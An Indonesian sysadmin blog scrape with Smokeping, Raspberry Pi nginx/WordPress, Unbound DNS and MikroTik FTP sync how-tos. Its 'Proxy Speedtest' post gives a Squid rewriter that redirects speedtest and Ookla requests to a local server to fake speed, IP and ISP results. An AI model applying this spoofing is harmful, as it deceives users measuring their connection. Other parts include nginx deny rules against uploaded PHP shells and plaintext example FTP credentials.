menu    = GemscoolBaru
title   = Gemscool-49.50.7.21
host    = 49.50.7.21

#++ Gemscool-Baru-254
#menu = GemscoolBaru-254
#title = Gemscool-49.50.7.254-(tracert via telkom)
#host = 49.50.7.254

++ MusuhAbadi
menu    = MusuhAbadi
title   = MusuhAbadi-103.29.186.20
host    = 103.29.186.20

++ Wavegame
menu = Wavegame
title = Wavegame-116.212.98.1
host = 116.212.98.1

++ Lytogame
menu = Lytogame
title = Lytogame-202.93.16.1
host = 202.93.16.1

++ LytogameCF
menu    = LytogameCF
title   = Lytogame CrossFire-202.93.21.80
host    = 202.93.21.80

++ Megaxus
menu = Megaxus
title = Megaxus-122.102.47.10
host = 122.102.47.10
#122.102.48.1

++ XSHOT
menu    = XSHOT
title   = XSHOT-180.178.110.20
host    = 180.178.110.20

++ CSO
menu    = CSO
title   = CSO-122.102.53.48
host    = 122.102.53.48

++ HeroesOfNewerth
menu = HON
title = HeroesOfNewerth-103.4.175.34
host = 103.4.175.34


+ CPE
menu  = CPE
title  = CPE All Client

++ SSN
menu    = SSN
title = SSN 113.20.143.1
host    = 113.20.143.1


+ ContohParent
menu    = ContohParent
title   = Ini Adalah Contoh Parent

++ gcp
menu    = gcp
title   = gcp
host    = 10.10.2.2

Lalu buka browser http://ip-smokepingnya.net/smokeping/smokeping.cgi

Saturday, March 26, 2016

Proxy Speedtest

Bagi yang penasaran aja...
Manipulasi speedtest (speed, IP, ISP)-squid 3.x TPROXY mode Feat Apache2 dalam 1 mesin

===url:
http://www.speedtest.net/
http://speedtest.telin.co.id/
http://speedtest.cbn.net.id/

===sample url yg direwrite:
--speedtest >> unt yg ini uda pada jago
http://nms-bdg.neuviz.net.id/speedtest/speedtest/latency.txt?x=1458959070078
http://nms-bdg.neuviz.net.id/speedtest/speedtest/random350x350.jpg?x=1458959071250&y=1
http://nms-bdg.neuviz.net.id/speedtest/speedtest/upload.php?x=0.17716197622939944

--IP/ISP
http://www.speedtest.net/id/speedtest-config.php?x=1439780380789
http://api.ookla.com/ipaddress.php

=======script rewriter.pl======
#!/usr/bin/perl
# @ http://www2.fh-lausitz.de/launic/comp/misc/squid/projekt_youtube/
# referensi dan terimakasih khususnya pada MikroTiker N SquidLover-Ces Pun-Syaifudin JW aka Ucok Karnadi
#### var
use IO::File;
$|=1;
STDOUT->autoflush(1);
$debug=0; ## recommended:0
$bypassallrules=0; ## recommended:0
$sucks=""; ## unused
$sucks="sucks" if ($debug>=1);
$timenow="";
$printtimenow=1; ## print timenow: 0|1
my $logfile = '/tmp/rewrite-ruwet.log';

open my $logfh, '>>', $logfile
or die "Couldn't open $logfile for appending: $!\n" if $debug;
$logfh->autoflush(1) if $debug;

while (<>) {
$timenow=time()." " if ($printtimenow);
‪#‎print‬ $logfh "$timenow"."in : $_" if ($debug>=1);
#print $logfh "in : $_" if ($debug>=1);
chop; ## strip eol
my $urlku = $_;
#@X = split;
@X = split(" ",$urlku);
$a = $X[0]; ## chanel
$b = $X[1]; ## url
$c = $X[2]; ## ip
$u = $b; ## url

print $logfh "in : $_\n" if ($debug>=1);

if ($bypassallrules){
$out="$u"; ## map 1:1

} elsif ($u=~ m/^http:\/\/.*\/(speedtest\/.*)/) {
$out="OK rewrite-url=http://192.168.4.1:8081/$1";

} elsif ($u=~ m/^http:\/\/.*speedtest\.net\/id\/(.*)/) {
$out="OK rewrite-url=http://192.168.4.1:8081/speedtest/$1";

} elsif ($u=~ m/^http:\/\/.*api\.ookla\.com\/(.*)/) {
$out="OK rewrite-url=http://192.168.4.1:8081/speedtest/$1";

} else {
$out="ERR";
}
print $logfh "out: $a $out\n" if ($debug>=1);
print "$a $out\n";
}
close $logfh if ($debug);

===edit squid.conf

acl speedtest url_regex \/speedtest\/.*\.(jpg|png|txt|php).*
acl speedtest2 url_regex ^http:\/\/.*speedtest\.net\/id\/.*\.php.*
acl speedtest3 url_regex ^http:\/\/.*api\.ookla\.com\/.*\.php

url_rewrite_access allow speedtest
url_rewrite_access allow speedtest2
url_rewrite_access allow speedtest3

url_rewrite_access deny all

url_rewrite_program /etc/squid/rewrite-ruwet.pl

redirector_bypass on

cache_peer 192.168.4.1 parent 8081 0 no-digest no-tproxy
dead_peer_timeout 5 seconds
cache_peer_access 192.168.4.1 allow speedtest
cache_peer_access 192.168.4.1 allow speedtest2
cache_peer_access 192.168.4.1 allow speedtest3

cache_peer_access 192.168.4.1 deny all

url_rewrite_children 32 startup=10 idle=1 concurrency=50

Reff tambahan yg msh gagal:
http://www.squid-cache.org/Doc/config/always_direct/
http://www.squid-cache.org/Doc/config/never_direct/

Wednesday, March 23, 2016

Install Wordpress on Nginx

Melanjutkan bahasan pada link berikut ini mengenai instalasi wordpress di web server berbasis nginx.

root@raspberrypi:~# cd /var/www/html/
root@raspberrypi:/var/www/html# wget https://wordpress.org/latest.tar.gz

Setelah terdownload, buka web server Anda. Ketika tidak mau langsung ke setup wordpress, pastikan default index nya menggunakan index.php, Cek konfigurasi nginx.conf

root@raspberrypi:/var/www/html# nano /etc/nginx/sites-enabled/default

Tambahkan index.php pada tag indexing

# Add index.php to the list if you are using PHP
index index.html index.php index.htm index.nginx-debian.html;

*) saya tambahkan index.php pada file tersebut
Jangan lupa restart nginx

root@raspberrypi:/var/www/html# /etc/init.d/nginx restart
[ ok ] Restarting nginx (via systemctl): nginx.service.
root@raspberrypi:/var/www/html#

Buka lagi web servernya lalu muncul setup wordpress.
Langkah selanjutnya yakni buat akun mysql, Caranya :
Masuk ke mysql

root@raspberrypi:/var/www/html# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.46-0+deb8u1 (Debian)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Lalu ikuti langkah-langkah seperti berikut

mysql> create database wordpress;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON wordpress.* TO "userku"@"localhost" IDENTIFIED BY "rahasia";
Query OK, 0 rows affected (0.00 sec)

keterangan :
wordpress = nama database
userku = user database
rahasia = passwordnya

Buka browser lagi dan ikuti langkah2nya instalasi Wordpress hingga selesai :)

Install NginX PHP5 Mysql-Server on Raspberry

apt-get install nginx php5-fpm php5-mysql mysql-server

nano /etc/nginx/sites-available/default

Perhatikan bagian ini

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;

                # With php5-cgi alone:
                #fastcgi_pass 127.0.0.1:9000;
                # With php5-fpm:
                fastcgi_pass unix:/var/run/php5-fpm.sock;
        }

Ingat, kasih tanda # pada fastcgi_pass 127.0.0.1:9000; karena bentrok dengan yang dibawahnya
Pastikan konfigurasi nginx.conf betul

root@raspberrypi:/home/pi# nginx -t -c /etc/nginx/nginx.conf
nginx: [emerg] "fastcgi_pass" directive is duplicate in /etc/nginx/sites-enabled/default:51
nginx: configuration file /etc/nginx/nginx.conf test failed

Kalau salah cek lagi mungkin ada yang keliru dikit, Cek lagi untuk memastikan nginx.conf

root@raspberrypi:/home/pi# nginx -t -c /etc/nginx/nginx.conf
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

Lalu restart fpm-php nya

root@raspberrypi:/home/pi# /etc/init.d/php5-fpm restart
[ ok ] Restarting php5-fpm (via systemctl): php5-fpm.service.
root@raspberrypi:/home/pi#

Restart nginx

root@raspberrypi:/home/pi# /etc/init.d/nginx restart
[ ok ] Restarting nginx (via systemctl): nginx.service.
root@raspberrypi:/home/pi#

Sekarang buat file /var/www/html/info.php yang isinya

<?php phpinfo();?>

Lalu buka browser sampai muncul seperti ini.

Selanjutnya bisa anda install wordpress, dll.

Tambahan :

Setting agar tidak bisa upload file dot php untuk menangguangi phpshell dan me-restrict file yang terhiden seperti .htaccess
tambahkan berikut ini pada file /etc/nginx/sites-available/default tadi. Taruh dibawah
fastcgi_pass unix:/var/run/php5-fpm.sock;
}

        # Deny access to any files with a .php extension in the uploads directory
        # Works in sub-directory installs and also in multisite network
        # Keep logging the requests to parse later (or to pass to firewall utilities such as fail2ban)
        #
        location ~* /(?:uploads|files)/.*\.php$ {
                deny all;
        }

        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one

        location ~ /\.ht {
                deny all;
        }

Mengatasi Raspberry Pi Space Left

Jika pernah nyoba raspberry, biasanya setingan mountpoint diatur defaultnya kecil. Sehingga kurang leluasa untuk instalasi package yang diinginkan. Misalnya begini :

$ df -h
Filesystem      Size Used Avail Use% Mounted on
rootfs          1.8G 1.7G     0 100% /
/dev/root       1.8G 1.7G     0 100% /
devtmpfs         93M     0   93M   0% /dev
tmpfs            19M 220K   19M   2% /run
tmpfs           5.0M     0 5.0M   0% /run/lock
tmpfs            37M     0   37M   0% /run/shm
/dev/mmcblk0p1   56M   17M   40M 30% /boot
tmpfs            37M     0   37M   0% /tmp

Perhatikan rootfs dan /dev/root penggunaan 100%

Padahal sdcard anda lebih besar dari itu, 32GB sekalipun akan percumah karena memang dibatasi oleh pengaturan defaultnya raspberry.

SOLUSI :
ketikkan pada console/terminal raspberry : raspi-config

root@raspberrypi:/home/pi# raspi-config

Lalu pilih Expand Filesystem dan ikuti petunjuknya lalu restart.

Hasilnya :

root@raspberrypi:/home/pi# df -h
Filesystem      Size Used Avail Use% Mounted on
/dev/root        30G 1.1G   27G   4% /
devtmpfs        459M     0 459M   0% /dev
tmpfs           463M     0 463M   0% /dev/shm
tmpfs           463M 6.2M 457M   2% /run
tmpfs           5.0M 4.0K 5.0M   1% /run/lock
tmpfs           463M     0 463M   0% /sys/fs/cgroup
/dev/mmcblk0p1   60M   20M   41M 34% /boot

Instalasi Unbound

Apa itu Unbound ?
Unbound adalah salah satu aplikasi DNS Server.
Fungsinya apa ?
Sebagai resolver
Apa itu resolver ?
Untuk menerjemahkan Domain ke IP.
Misalkan detik.com itu ip servernya 203.190.242.69 dan 203.190.241.43
Maka butuh DNS Server untuk meresolve detik.com ke ip tadi

Install Unbound

root@pi:/home/pi# apt-get install unbound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
libunbound2 unbound-anchor
The following NEW packages will be installed:
libunbound2 unbound unbound-anchor
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 864 kB of archives.
After this operation, 1,998 kB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://kartolo.sby.datautama.net.id/debian/ jessie/main libunbound2 armhf 1.4.22-3 [272 kB]
Get:2 http://kartolo.sby.datautama.net.id/debian/ jessie/main unbound-anchor armhf 1.4.22-3 [96.6 kB]
Get:3 http://kartolo.sby.datautama.net.id/debian/ jessie/main unbound armhf 1.4.22-3 [495 kB]
Fetched 864 kB in 1s (707 kB/s)
Selecting previously unselected package libunbound2:armhf.
(Reading database ... 31542 files and directories currently installed.)
Preparing to unpack .../libunbound2_1.4.22-3_armhf.deb ...
Unpacking libunbound2:armhf (1.4.22-3) ...
Selecting previously unselected package unbound-anchor.
Preparing to unpack .../unbound-anchor_1.4.22-3_armhf.deb ...
Unpacking unbound-anchor (1.4.22-3) ...
Selecting previously unselected package unbound.
Preparing to unpack .../unbound_1.4.22-3_armhf.deb ...
Unpacking unbound (1.4.22-3) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for systemd (215-17+deb8u3) ...
Setting up libunbound2:armhf (1.4.22-3) ...
Setting up unbound-anchor (1.4.22-3) ...
Setting up unbound (1.4.22-3) ...
Processing triggers for libc-bin (2.19-18+deb8u3) ...
Processing triggers for systemd (215-17+deb8u3) ...
root@pi:/home/pi#

Lalu masuk ke directory /etc/unbound

root@pi:/home/pi# cd /etc/unbound/
root@pi:/etc/unbound# wget ftp://ftp.internic.net/domain/named.cache
--2016-03-23 09:20:07-- ftp://ftp.internic.net/domain/named.cache
           => ‘named.cache’
Resolving ftp.internic.net (ftp.internic.net)... 192.0.32.9, 2620:0:2d0:200::9
Connecting to ftp.internic.net (ftp.internic.net)|192.0.32.9|:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done. ==> CWD (1) /domain ... done.
==> SIZE named.cache ... 3171
==> PASV ... done.    ==> RETR named.cache ... done.
Length: 3171 (3.1K) (unauthoritative)

named.cache                               100%[=======================================================================================>]   3.10K --.-KB/s   in 0.002s

2016-03-23 09:20:13 (1.99 MB/s) - ‘named.cache’ saved [3171]

root@pi:/etc/unbound#

ubah permission unbound

root@pi:/etc/unbound# unbound-control-setup
setup in directory /etc/unbound
unbound_server.key exists
unbound_control.key exists
create unbound_server.pem (self signed certificate)
create unbound_control.pem (signed client certificate)
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
Setup success. Certificates created.
root@pi:/etc/unbound# chown unbound:root unbound_*
root@pi:/etc/unbound# chmod 440 unbound_*
root@pi:/etc/unbound#

edit file /etc/unbound/unbound.conf

server:
 verbosity: 1
# statistics-interval: 120 = default
 statistics-interval: 0
# statistics-cumulative: yes = default
 statistics-cumulative: yes
# num-threads:    = sesuaikan dengan core prosesor
 num-threads: 2
 interface: 0.0.0.0
# outgoing-range: 512  = default
 outgoing-range: 4096
# num-queries-per-thread: 1024 = default
 num-queries-per-thread: 4096
# msg-cache-size: 16m  = default
 msg-cache-size: 128m
# rrset-cache-size: 32m  = default
 rrset-cache-size: 128m
# msg-cache-slabs: 4  = default
 msg-cache-slabs: 1
# rrset-cache-slabs: 4  = default
 rrset-cache-slabs: 1
 cache-max-ttl: 86400
 infra-host-ttl: 60
 infra-lame-ttl: 120
 infra-cache-numhosts: 10000
 infra-cache-lame-size: 10k
 do-ip4: yes
 do-ip6: no
 do-udp: yes
 do-tcp: yes
 do-daemonize: yes
# REFUSE ALL
 access-control: 0.0.0.0/0 refuse
# TELKOM
# access-control: 36.64.0.0/12 allow
#       access-control: 36.80.0.0/13 allow
#       access-control: 36.88.0.0/16 allow
#       access-control: 61.94.0.0/16 allow
#       access-control: 110.136.0.0/14 allow
#       access-control: 118.96.0.0/15 allow
#       access-control: 118.98.0.0/17 allow
#       access-control: 125.160.0.0/13 allow
#       access-control: 180.241.0.0/12 allow
#       access-control: 202.134.0.0/21 allow
#       access-control: 222.124.0.0/16 allow
#       access-control: 203.130.192.0/18 allow
# My Subnet
 access-control: xx.xxx.2.0/24 allow
# localhost
 access-control: 127.0.0.0/8 allow
# rfc1918
 access-control: 192.168.0.0/16 allow
 access-control: 172.16.0.0/12 allow
 access-control: 10.0.0.0/8 allow

 chroot: "/etc/unbound"
 username: "unbound"
 directory: "/etc/unbound"
 logfile: "/etc/unbound/unbound.log"
 use-syslog: no
 pidfile: "/var/run/unbound.pid"
 root-hints: "/etc/unbound/named.cache"

 identity: "DNS"
 version: "1.4"
 hide-identity: yes
 hide-version: yes
 harden-glue: yes
 do-not-query-address: 127.0.0.1/8
 do-not-query-localhost: yes
 module-config: "iterator"

 #zone localhost
 local-zone: "localhost." static
 local-data: "localhost. 10800 IN NS localhost."
 local-data: "localhost. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
 local-data: "localhost. 10800 IN A 127.0.0.1"
 local-zone: "127.in-addr.arpa." static
 local-data: "127.in-addr.arpa. 10800 IN NS localhost."
 local-data: "127.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 2 3600 1200 604800 10800"
 local-data: "1.0.0.127.in-addr.arpa. 10800 IN PTR localhost."

        #zone rahox.net.id
        local-zone: "rahox.net.id." static
        local-data: "rahox.net.id. 86400 IN NS ns1.rahox.net.id."
        local-data: "rahox.net.id. 86400 IN SOA rahox.net.id. hostmaster.rahox.net.id. 3 3600 1200 604800 86400"
        local-data: "rahox.net.id. 86400 IN A 49.128.181.202"
        local-data: "www.rahox.net.id. 86400 IN A 49.128.181.202"
        local-data: "koe-asu.com. 86400 IN A 172.16.16.2"
        local-data: "koe-asu.com. 86400 IN A 172.16.16.2"
        local-data: "cache.google.com. 86400 IN A 118.98.111.1"
        local-data: "ns1.rahox.net.id. 86400 IN A 49.128.181.202"
        local-data: "mail.rahox.net.id. 86400 IN A 49.128.181.202"
        local-data: "rahox.net.id. 86400 IN MX 10 mail.rahox.net.id."
        local-data: "rahox.net.id. 86400 IN TXT v=spf1 a mx ~all"

# PTR RECORD
        local-zone: "181.128.49.in-addr.arpa." static
        local-data: "181.128.49.in-addr.arpa. 10800 IN NS rahox.net.id."
        local-data: "181.128.49.in-addr.arpa. 10800 IN SOA rahox.net.id. hostmaster.rahox.net.id. 4 3600 1200 604800 864000"
        local-data: "202.181.128.49.in-addr.arpa. 10800 IN PTR rahox.net.id."

# STATIC RESOLVER
# START HERE
 local-data: "images.via.com. 86400 IN A 23.200.179.234"
        local-data: "cfs.u-ad.info. 86400 IN A 127.0.0.1"
        local-data: "www.hao123.com. 86400 IN A 74.125.68.100"
# fbstatic-a.akamaihd.net
# local-data: "fbstatic-a.akamaihd.net. 86400 IN A 114.4.39.203"
# local-data: "fbstatic-a.akamaihd.net. 86400 IN A 114.4.39.224"
# local-data: "fbstatic-a.akamaihd.net. 86400 IN A 114.4.39.210"
# download.microsoft.com
        local-data: "download.microsoft.com. 86400 IN A 184.29.95.47"
        local-data: "download.microsoft.com. 86400 IN A 118.98.42.121"
# www2.ati.com
        local-data: "www2.ati.com. 86400 IN A 23.51.11.227"
# akamai vimeo
# local-data: "skyfiregcs-a.akamaihd.net. 86400 IN A 118.98.95.82"
#       local-data: "skyfiregcs-a.akamaihd.net. 86400 IN A 118.98.95.75"
# local-data: "pdlvimeocdn-a.akamaihd.net. 86400 IN A 118.98.93.48"
#       local-data: "pdlvimeocdn-a.akamaihd.net. 86400 IN A 118.98.93.50"
# fbcdn-video - ip 88,97,121,136,146
        local-data: "fbcdn-video-a-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-b-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-c-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-d-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-e-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-f-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-g-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-h-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-i-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-j-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-k-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-l-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-m-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-n-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-o-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-p-a.akamaihd.net. 86400 IN A 118.98.42.88"
        local-data: "fbcdn-video-a-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-b-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-c-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-d-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-e-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-f-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-g-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-h-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-i-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-j-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-k-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-l-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-m-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-n-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-o-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-p-a.akamaihd.net. 86400 IN A 118.98.42.97"
        local-data: "fbcdn-video-a-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-b-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-c-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-d-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-e-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-f-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-g-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-h-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-i-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-j-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-k-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-l-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-m-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-n-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-o-a.akamaihd.net. 86400 IN A 118.98.42.121"
        local-data: "fbcdn-video-p-a.akamaihd.net. 86400 IN A 118.98.42.121"

# login garenaplus messenger
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.172.49"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.207"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.177"
               local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.144"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.174"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.141"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.204"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.173"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.200"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.146"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.172"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.178"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.150"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.188"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.176"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.190"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.148"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.201"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.171"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.175"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.142"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.206"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.186"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.187"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.170"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.143"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.149"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.147"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.189"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.202"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.203"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.145"
        local-data: "live.imconnect.garenanow.com. 86400 IN A 203.117.158.205"
# acer
        local-data: "global-download.acer.com. 86400 IN A 118.98.37.40"
        local-data: "global-download.acer.com. 86400 IN A 118.98.37.50"
# asus
        local-data: "dlcdnet.asus.com. 86400 IN A  125.160.18.32"
        local-data: "dlcdnet.asus.com. 86400 IN A  125.160.18.35"
        local-data: "dlcdnet.asus.com.edgesuite.net. 86400 IN A  125.160.18.32"
        local-data: "dlcdnet.asus.com.edgesuite.net. 86400 IN A  125.160.18.35"
# samsung
        local-data: "downloadcenter.samsung.com. 86400 IN A  125.160.18.48"
        local-data: "downloadcenter.samsung.com. 86400 IN A  125.160.18.33"
# nvidia
        local-data: "us.download.nvidia.com. 86400 IN A  125.160.18.48"
        local-data: "us.download.nvidia.com. 86400 IN A  125.160.18.33"
# wdc
        local-data: "download.wdc.com. 86400 IN A  125.160.18.48"
        local-data: "download.wdc.com. 86400 IN A  125.160.18.33"
        local-data: "download.wdc.com. 86400 IN A  118.98.93.48"
        local-data: "download.wdc.com. 86400 IN A  118.98.93.19"
# adobe
        local-data: "get3.adobe.com. 86400 IN A  23.192.114.114"
# oracle
        local-data: "download.oracle.com. 86400 IN A 125.160.18.24"
        local-data: "download.oracle.com. 86400 IN A 125.160.18.43"
# intel
        local-data: "ark.intel.com. 86400 IN A 125.160.18.27"
        local-data: "ark.intel.com. 86400 IN A 125.160.18.58"

forward-zone:
        name: "dl.garenanow.com"
        forward-addr:118.98.44.166
        forward-addr:118.98.44.100
forward-zone:
        name: "cdn.garenanow.com"
        forward-addr:118.98.44.166
        forward-addr:118.98.44.100
forward-zone:
        name: "akamai.net"
        forward-addr:118.98.44.166
        forward-addr:114.5.5.77
forward-zone:
        name: "google.com"
        forward-addr:118.98.44.166
        forward-addr:114.5.5.77
forward-zone:
        name: "google.co.id"
        forward-addr:118.98.44.166
        forward-addr:114.5.5.77

forward-zone:
 name: "."
 forward-addr: 8.8.8.8
 forward-addr: 208.67.222.222


remote-control:
 control-enable: yes
 control-interface: 127.0.0.1
 control-port: 953
 server-key-file: "/etc/unbound/unbound_server.key"
 server-cert-file: "/etc/unbound/unbound_server.pem"
 control-key-file: "/etc/unbound/unbound_control.key"
 control-cert-file: "/etc/unbound/unbound_control.pem"

Sampai di sini sudah selesai, jangan lupa restart service unbound

root@pi:/etc/unbound# /etc/init.d/unbound restart
[ ok ] Restarting unbound (via systemctl): unbound.service.

Jangan lupa seting resolv.conf seperti berikut ini

root@pi:/etc/unbound# cat /etc/resolv.conf
# Generated by resolvconf
nameserver 127.0.0.1

Dan pada network interfaces konfigurasinya ganti seperti berikut

# interfaces(5) file used by ifup(8) and ifdown(8)
# Please note that this file is written to be used with dhcpcd
# For static IP, consult /etc/dhcpcd.conf and 'man dhcpcd.conf'

# Include files from /etc/network/interfaces.d:
source-directory /etc/network/interfaces.d

auto lo
iface lo inet loopback

auto eth0
allow-hotplug eth0
iface eth0 inet static
        address 172.16.17.18
        netmask 255.255.255.252
        gateway 172.16.17.17
        dns-nameservers 127.0.0.1

Restart interfaces

root@pi:/etc/unbound# /etc/init.d/networking restart
[ok] Restarting networking (via systemctl): networking.service

Sekarang tahap uji coba apakah Unbound telah berjalan sebagaimana mestinya

root@pi:/etc/unbound# nslookup detik.com
Server:         127.0.0.1
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   detik.com
Address: 203.190.242.69
Name:   detik.com
Address: 203.190.241.43

Generator Addresslist Mikrotik to File

studi kasus :
ada sebuah router yang menyimpan address-list penting seperti addresslist game. dengan harapan address list pada router client SAMA dengan router utama tadi dan secara otomatis ter-update dengan interval waktu yang telah ditentukan. Jadi ketika si router utama melakukan update addresslist maka client secara otomatis mengikuti apa yang ada pada address list router utama tadi.

konsep :
export address list tertentu pada router utama
terbentuklah file spesifik yang nantinya sebagai master export address list router client

pada mikrotik buat script export addresslist berdasarkan list name
asumsi kali ini menggunakan list=cidr_games pada /ip firewall address-list

:global nama "cidr_games"
/ip firewall address-list ;export file=all-addr ;remove [find list!="$nama"] ;export file="$nama-addr" ;remove [find] ;/import all-addr.rsc ;
:delay 5
/file remove all-addr.rsc
:log warning message="Export $nama finished..."

setelah itu terbentuk file cidr_games-addr.rsc pada mikrotik
dan file ini nantinya akan didownload oleh si mesin generator (linux)

install ncftp yang digunakan untuk mendownload addresslist via ftp
apt-get install ncftp

crontab -e
# auto download addresslist cidr_game dari core router tiap jam 5:10 pagi
10 5 * * * /root/addresslistgenerator/GetFromRouter
11 5 * * * /bin/chmod 755 /var/www/pub/addresslist/*

nano /root/addresslistgenerator/GetFromRouter
rm -rfv /var/www/pub/addresslist/cidr_games-addr.rsc
ncftpget -b -P 211 -u uftp -p pftp 49.128.181.182 /var/www/pub/addresslist/ /cidr_games-addr.rsc
sleep 5
chmod 755 /var/www/pub/addresslist/cidr_games-addr.rsc

di mikrotik tambahkan user uftp

/user add address="" disabled=no group=ftponly name=uftp

jangan lupa cek port ftp mikrotiknya

/ip service set ftp address="" disabled=no port=211

langsung dari router client

/tool fetch mode=ftp address=10.10.182.1 port=211 user=uftp password=pftp src-path=/cidr_games-addr.rsc
/import cidr_games-addr.rsc
:log warning message="import cidr_games sukses..."

Repository Raspbian Jessie

Berikut ini repositori rapbian di /etc/apt/sources.list

# Uncomment line below then 'apt-get update' to enable 'apt-get source'
deb-src http://archive.raspbian.org/raspbian/ jessie main contrib non-free rpi
